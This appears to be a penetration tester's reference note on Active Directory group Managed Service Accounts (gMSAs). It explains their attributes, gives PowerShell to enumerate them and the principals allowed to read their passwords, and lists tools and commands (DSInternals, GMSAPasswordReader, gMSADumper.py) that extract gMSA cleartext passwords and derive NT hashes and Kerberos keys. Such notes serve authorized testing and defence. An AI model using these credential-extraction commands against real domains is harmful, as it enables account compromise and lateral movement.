# Exploitation - gMS accounts (gMSAs) ## Active Directory - group Managed Service Accounts (gMSAs) #### Overview Introduced in `Windows Server 2012`, `group Managed Service Accounts (gMSAs)` are service accounts managed by the Active Directory domain services. `gMSAs` address a shortcoming of standalone `Managed Service Accounts (MSA)`, that were introduced in `Windows Server 2008`, and were only usable on a single computer. `gMSAs` use 240-byte passwords, generated and periodically rotated - 30 days by default - by (writable) Domain Controllers using the domain `Key Distribution Services (KDS)` `root key`. `gMSAs` created using the `New-ADServiceAccount` PowerShell cmdlet are by default placed in the default managed service accounts container (`CN=Managed Service Accounts,`). `gMSAs` are objects of class `ms-DS-Group-Managed-Service-Account` (subclass of `Computer`) with the following additional attributes: * `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`): defines which security principal(s) can retrieve the `gMSA` password (in the `msds-ManagedPassword` attribute). It corresponds to a security descriptor, with principal(s) having the right to retrieve the `gMSA` password being granted the `RIGHT_DS_READ_PROPERTY` access control right. * `msds-ManagedPassword`: a [`MSDS-MANAGEDPASSWORD_BLOB`](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) that contains the `gMSA`'s previous and current clear-text password, as well the expiration timers of the current password. The `msds-ManagedPassword` attribute is a constructed attribute, calculated by a (writable) Domain Controller upon each query using the `Key Distribution Services (KDS)` `root key` and the key identifiers. * `msDS-ManagedPasswordId` and `ms-DS-ManagedPasswordPreviousId`: contain the key identifier used to compute, respectively, the current and previous password of the `gMSA`. * `ms-DS-ManagedPasswordInterval`: contains the interval period in days under which the `gMSA`'s password will be rotated. By default, the rotation period is 30 days. #### gMSAs enumeration The PowerShell `ActiveDirectory` module can be used to enumerate the `gMSAs`: ```bash # Enumerates the gMSA in the domain. Get-ADServiceAccount -Filter * Get-ADObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)" -Properties * # Retrieves the principals allowed to retrieve gMSAs' password. Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword # Retrieves the principals allowed to retrieve gMSAs' password and highlights potentially dangerous rights (simple analysis based on direct principal names matching). $PrivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Admins', 'CN=Enterprise Admins', 'CN=Domain Controllers')) $UnprivilegedPrincipalsRegex = [string]::Join('|', @('CN=Domain Users', 'Everyone', 'CN=Domain Computers', 'Authenticated Users', 'Anonymous')) Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword | ForEach-Object { Write-Host -ForegroundColor DarkGreen -BackgroundColor White $_.SamAccountName Write-Host $_.DistinguishedName Write-Host $_.SID Write-Host "`n" Write-Host "PrincipalsAllowedToRetrieveManagedPassword:" foreach ($Principal in $_.PrincipalsAllowedToRetrieveManagedPassword) { If ($Principal -match $UnprivilegedPrincipalsRegex) { Write-Host -ForegroundColor Green $Principal } ElseIf ($Principal -match $PrivilegedPrincipalsRegex) { Write-Host -ForegroundColor Red $Principal } Else { Write-Host -ForegroundColor Yellow $Principal } } Write-Host "`n" } ``` #### gMSAs ACL enumeration and msDS-GroupMSAMembership modification Refer to the `[ActiveDirectory] ACL exploiting` note (`group Managed Service Accounts (gMSA)` section) for more information on techniques and tools to modify `gMSAs`'s `msDS-GroupMSAMembership` attribute. #### gMSAs password retrieval Multiple tools and utilities can be used to retrieve a `gMSA` account password, and further derivate its `NTLM` / `NTHash` and `Kerberos` secrets (`AES 128` and `AES 256` keys): | Tool | URL | Description | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |

PowerShell ActiveDirectory and DSInternals modules:

ActiveDirectory module:
Get-ADServiceAccount

DSInternals module: ConvertFrom-ADManagedPasswordBlob
ConvertTo-NTHash

| |

Combination of PowerShell cmdlets from the ActiveDirectory and DSInternals modules to retrieve all or the specified gMSAs password and compute the corresponding NTLM / NTHash and Kerberos secrets.

Uses the current security context and supports alternate credentials (username/password).

| | [`GMSAPasswordReader`](https://github.com/rvazarkar/GMSAPasswordReader) | |

C# utility that retrieve the specified gMSA current and past password to calculate the corresponding NTLM / NTHash and Kerberos secrets.

Uses the current security context.

| | [`gMSADumper.py`](https://github.com/micahvandeusen/gMSADumper) |



Compiled standalone Linux / Windows x64 binaries:

|

Python script to retrieve all gMSAs password (that the given user has access to) to compute the corresponding NTLM / NTHash.

Supports user authentication with username/password, username/NTHash, or Kerberos tickets (on Linux using a ticket in the credential cache (ccache) format). Does not leverage the current security context.

| ```bash # PowerShell ActiveDirectory and DSInternals modules. # Import-Module "\DSInternals.psd1" $gMSA = Get-ADServiceAccount -Identity '' -Properties 'msDS-ManagedPassword' $msDSMP_blob = $gMSA.'msDS-ManagedPassword' # Decodes the MSDS-MANAGEDPASSWORD_BLOB data structure using the DSInternals module. $CleartextPassword = ConvertFrom-ADManagedPasswordBlob $msDSMP_blob $CleartextPassword # Converts the cleartext password to the corresponding NTLM / NT hash using the DSInternals module. # To compute the corresponding Kerberos secrets using the cleartext password, refer to the "[ActiveDirectory] Kerberos tickets usage" note. ConvertTo-NTHash -Password $CleartextPassword.SecureCurrentPassword # GMSAPasswordReader C# utility. GMSAPasswordReader.exe --AccountName # gMSADumper.py Python script and standalone compiled binaries. gMSADumper.py -d -u -p # if only the NT_HASH is known: 'aad3b435b51404eeaad3b435b51404ee:' gMSADumper.py -d -u -p # On Linux, Kerberos authentication using a Ticket-Granting-Ticket in the ccache format. gMSADumper.py -k -d -u ``` *** ## References